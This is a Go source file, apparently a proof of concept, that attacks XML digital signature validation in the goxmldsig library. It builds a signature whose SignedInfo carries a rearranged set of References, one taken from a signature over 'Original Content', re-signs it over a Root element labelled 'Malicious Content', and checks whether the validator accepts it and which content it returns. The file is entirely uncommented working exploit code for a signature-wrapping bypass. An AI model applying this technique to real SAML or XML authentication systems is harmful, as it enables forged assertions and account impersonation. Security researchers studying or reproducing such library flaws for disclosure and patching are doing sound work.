package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/tls"
"crypto/x509"
"encoding/base64"
"fmt"
"math/big"
"time"
"github.com/beevik/etree"
dsig "github.com/russellhaering/goxmldsig"
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement("Root")
root.CreateAttr("ID", "target")
root.SetText("Malicious Content")
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement("./SignedInfo")
existingRef := signedInfo.FindElement("./Reference")
existingRef.CreateAttr("URI", "#dummy")
originalEl := etree.NewElement("Root")
originalEl.CreateAttr("ID", "target")
originalEl.SetText("Original Content")
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement("./SignedInfo/Reference").Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println("c14n error:", err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement("./SignatureValue")
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println("XML:")
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println("validation failed:", err)
} else {
fmt.Println("validation ok")
fmt.Println("validated text:", validated.Text())
}
}